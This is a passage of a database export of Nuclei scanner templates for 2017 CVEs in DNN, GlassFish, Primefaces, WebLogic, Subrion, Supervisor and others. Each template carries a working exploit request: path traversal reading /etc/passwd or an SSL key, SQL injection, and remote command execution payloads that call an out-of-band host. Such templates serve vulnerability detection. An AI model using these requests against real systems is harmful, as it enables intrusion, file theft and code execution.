https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-0929\n cwe-id: CWE-918\n epss-score: 0.00753\n epss-percentile: 0.80628\n cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dnnsoftware\n product: dotnetnuke\n tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950", "hash": "0ceb67263ec7abd036e80ae6fc777cf7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fa9" }, "name": "CVE-2017-1000028.yaml", "content": "id: CVE-2017-1000028\n\ninfo:\n name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion\n author: pikpikcu,daffainfo\n severity: high\n description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.\n reference:\n - https://www.exploit-db.com/exploits/45196\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n - https://www.exploit-db.com/exploits/45196/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-1000028\n cwe-id: CWE-22\n epss-score: 0.97516\n epss-percentile: 0.99984\n cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: glassfish_server\n tags: cve,cve2017,oracle,glassfish,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\"\n - \"{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4a0a004730450220197143a221aff60682e5920e186b66ea318c0512f0d5433a907b9ece724df88b022100beab5d9053b43e2cac58d92a26aa2bdfec85b9cee740d246284232c2ba59e90e:922c64590222798bb761d5b6d8e72950", "hash": "d515e259ba8ba777c8bce30f963e98f3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307faa" }, "name": "CVE-2017-1000029.yaml", "content": "id: CVE-2017-1000029\n\ninfo:\n name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.\n reference:\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-1000029\n cwe-id: CWE-200\n epss-score: 0.00387\n epss-percentile: 0.70348\n cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: glassfish_server\n tags: cve,cve2017,glassfish,oracle,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resource/file%3a///etc/passwd/\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950", "hash": "0597ddb09233bdd84376aeff6d184d3e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fab" }, "name": "CVE-2017-1000163.yaml", "content": "id: CVE-2017-1000163\n\ninfo:\n name: Phoenix Framework - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of the Phoenix Framework.\n reference:\n - https://elixirforum.com/t/security-releases-for-phoenix/4143\n - https://vuldb.com/?id.109587\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000163\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-1000163\n cwe-id: CWE-601\n epss-score: 0.00186\n epss-percentile: 0.55009\n cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phoenixframework\n product: phoenix\n tags: cve,cve2017,redirect,phoenix,phoenixframework\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?redirect=/\\interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4a0a00473045022066d0d9509969142bbfbcf0eb417da56845541044c0685547d194ebb62e0364e0022100eaeac8289ca457b4603e6babedbbca92bed9163d0b07be773a03a4e1c82b5b82:922c64590222798bb761d5b6d8e72950", "hash": "96eb7045c30228a6c097f15f1ba2ea32", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fac" }, "name": "CVE-2017-1000170.yaml", "content": "id: CVE-2017-1000170\n\ninfo:\n name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion\n author: dwisiswant0\n severity: high\n description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.\n impact: |\n Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.\n remediation: |\n Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/49693\n - https://github.com/jqueryfiletree/jqueryfiletree/issues/66\n - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-1000170\n cwe-id: CWE-22\n epss-score: 0.70305\n epss-percentile: 0.97752\n cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jqueryfiletree_project\n product: jqueryfiletree\n tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php\"\n\n body: \"dir=%2Fetc%2F&onlyFiles=true\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"
  • \"\n - \"passwd
    • \"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b9e346f4bc199c5c0d4019c3d55480f4c69a0aa58566ef0af6b1d5097ab3260102204c81a7d73a9c46c562c114589710b19afcd82876e0c9bfce5698a075d42880cf:922c64590222798bb761d5b6d8e72950", "hash": "99b504213aa15aee4ad2fc6f95125d3a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fad" }, "name": "CVE-2017-1000486.yaml", "content": "id: CVE-2017-1000486\n\ninfo:\n name: Primetek Primefaces 5.x - Remote Code Execution\n author: Moritz Nentwig\n severity: critical\n description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.\n reference:\n - https://github.com/mogwailabs/CVE-2017-1000486\n - https://github.com/pimps/CVE-2017-1000486\n - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486\n - https://cryptosense.com/weak-encryption-flaw-in-primefaces/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-1000486\n cwe-id: CWE-326\n epss-score: 0.97013\n epss-percentile: 0.99726\n cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: primetek\n product: primefaces\n tags: cve2017,cve,primetek,rce,injection,kev\n\nhttp:\n - raw:\n - |\n POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n\n pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n\n matchers:\n - type: word\n part: header\n words:\n - 'Mogwailabs: CHECKCHECK'\n# digest: 4b0a004830460221008705283db1e276d968dd9b9bb0133072312deb7b46962195ff0237cbdbe58371022100cb9b42c506991d9e6bdc752569564cf00e79eba7dd83b19d99be99ee26ac19d3:922c64590222798bb761d5b6d8e72950", "hash": "3f8a02b254e9e51afb34e4a7fb15231c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fae" }, "name": "CVE-2017-10075.yaml", "content": "id: CVE-2017-10075\n\ninfo:\n name: Oracle Content Server - Cross-Site Scripting\n author: madrobot\n severity: high\n description: |\n Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches provided by Oracle to fix this vulnerability.\n reference:\n - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\n - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940\n - https://nvd.nist.gov/vuln/detail/CVE-2017-10075\n - http://www.securitytracker.com/id/1038940\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n cvss-score: 8.2\n cve-id: CVE-2017-10075\n epss-score: 0.00451\n epss-percentile: 0.72424\n cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: oracle\n product: webcenter_content\n google-query: inurl:\"/cs/idcplg\"\n tags: cve,cve2017,xss,oracle\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO\"\n - \"{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"ORACLE_QUERY\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950", "hash": "97a188d867f2714a5b24e4bdd2076f27", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307faf" }, "name": "CVE-2017-10271.yaml", "content": "id: CVE-2017-10271\n\ninfo:\n name: Oracle WebLogic Server - Remote Command Execution\n author: dr_set,ImNightmaree,true13\n severity: high\n description: |\n The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.\n remediation: |\n Apply the latest security patches provided by Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms.\n reference:\n - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271\n - https://github.com/SuperHacker-liuan/cve-2017-10271-poc\n - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-10271\n - http://www.securitytracker.com/id/1039608\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n cvss-score: 7.5\n cve-id: CVE-2017-10271\n epss-score: 0.97426\n epss-percentile: 0.99932\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: weblogic_server\n tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle\n\nhttp:\n - raw:\n - |\n POST /wls-wsat/CoordinatorPortType HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: text/xml\n\n \n \n \n \n \n \n \n \n /bin/bash\n \n \n -c\n \n \n ping -c 1 {{interactsh-url}}\n \n \n \n \n \n \n \n \n - |\n POST /wls-wsat/CoordinatorPortType HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: text/xml\n\n \n \n \n \n \n \n \n \n \n \n \n {{randstr}}\n \n \n \n \n \n \n \n \n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - regex(\"java.lang.ProcessBuilder || 0\", body)\n - contains(interactsh_protocol, \"dns\")\n - status_code == 500\n condition: and\n\n - type: dsl\n dsl:\n - body == \"{{randstr}}\"\n - status_code == 200\n condition: and\n# digest: 4b0a00483046022100cc1685ff29667003d078f1649e722afd7019dd57bfcb94fd210d4624aebdf5fd022100adcdc269c9a84770a1817b96f2a5513541930282e2cdb048fdf74c9e31f8e4d9:922c64590222798bb761d5b6d8e72950", "hash": "e87349fba5bf71eb7c493e6da712b06f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb0" }, "name": "CVE-2017-10974.yaml", "content": "id: CVE-2017-10974\n\ninfo:\n name: Yaws 1.91 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.\n impact: |\n The vulnerability allows an attacker to include local files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a patched version of Yaws or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/42303\n - https://nvd.nist.gov/vuln/detail/CVE-2017-10974\n - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt\n - https://www.exploit-db.com/exploits/42303/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-10974\n cwe-id: CWE-22\n epss-score: 0.96161\n epss-percentile: 0.9947\n cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: yaws\n product: yaws\n tags: cve,cve2017,edb,yaws,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%5C../ssl/yaws-key.pem\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - '!contains(tolower(body), \"\"\n - \"config id=\\\"config\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950", "hash": "6497685d1ec974086cc40eacd8d44616", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb2" }, "name": "CVE-2017-11444.yaml", "content": "id: CVE-2017-11444\n\ninfo:\n name: Subrion CMS <4.1.5.10 - SQL Injection\n author: dwisiswant0\n severity: critical\n description: \"Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.\"\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability.\n reference:\n - https://github.com/intelliants/subrion/issues/479\n - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11444\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-11444\n cwe-id: CWE-89\n epss-score: 0.018\n epss-percentile: 0.86776\n cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: intelliants\n product: subrion_cms\n tags: cve2017,cve,sqli,subrion,intelliants\n\nvariables:\n string: \"{{to_lower(rand_base(5))}}\"\n hex_string: \"{{hex_encode(string)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{string}}'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950", "hash": "cb39169a07b75e0f488a47d9dbf92cba", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb3" }, "name": "CVE-2017-11512.yaml", "content": "id: CVE-2017-11512\n\ninfo:\n name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: |\n ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches.\n reference:\n - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html\n - https://www.tenable.com/security/research/tra-2017-31\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11512\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2017-11512\n cwe-id: CWE-22\n epss-score: 0.97175\n epss-percentile: 0.99794\n cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: manageengine\n product: servicedesk\n shodan-query: http.title:\"ManageEngine\"\n tags: cve,cve2017,manageengine,lfr,unauth,tenable\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini'\n - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950", "hash": "f2f89b5ef1c86e5cdb9f34e8c06dd945", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb4" }, "name": "CVE-2017-11586.yaml", "content": "id: CVE-2017-11586\n\ninfo:\n name: FineCMS <5.0.9 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability.\n reference:\n - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11586\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-11586\n cwe-id: CWE-601\n epss-score: 0.00121\n epss-percentile: 0.46136\n cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: finecms\n product: finecms\n tags: cve,cve2017,redirect,finecms\n\nhttp:\n - raw:\n - |\n POST /index.php?s=member&c=login&m=index HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n - |\n GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n part: header\n regex:\n - 'Refresh:(.*)url=http:\\/\\/interact\\.sh'\n# digest: 4b0a00483046022100b9dd6b07bd9874ead239ed591f16da9a600ac73cdc8404ed8e9bcc90e3918104022100bbe20d6aa691239c1573bbf7ccd5993f2127b310bae7ce921c22cc05c615efdd:922c64590222798bb761d5b6d8e72950", "hash": "ffd7d6f739cb40fee0d40d071e940372", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb5" }, "name": "CVE-2017-11610.yaml", "content": "id: CVE-2017-11610\n\ninfo:\n name: XML-RPC Server - Remote Code Execution\n author: notnotnotveg\n severity: high\n description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches or disable the XML-RPC server if not required.\n reference:\n - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11610\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXGWOJNSWWK2TTWQJZJUP66FLFIWDMBQ/\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DTPDZV4ZRICDYAYZVUHSYZAYDLRMG2IM/\n - http://www.debian.org/security/2017/dsa-3942\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-11610\n cwe-id: CWE-276\n epss-score: 0.97449\n epss-percentile: 0.99947\n cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: supervisord\n product: supervisor\n shodan-query: http.title:\"Supervisor Status\"\n tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord\n\nhttp:\n - raw:\n - |\n POST /RPC2 HTTP/1.1\n Host: {{Hostname}}\n Accept: text/xml\n Content-type: text/xml\n\n \n supervisor.supervisord.options.warnings.linecache.os.system\n \n \n nslookup {{interactsh-url}}\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: and\n# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950", "hash": "05cfd680466b9fe19409ab93d63aaaa0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fb6" }, "name": "CVE-2017-11629.yaml", "content": "id: CVE-2017-11629\n\ninfo:\n name: FineCMS <=5.0.10 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability.\n reference:\n - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse\n - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS\n - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n 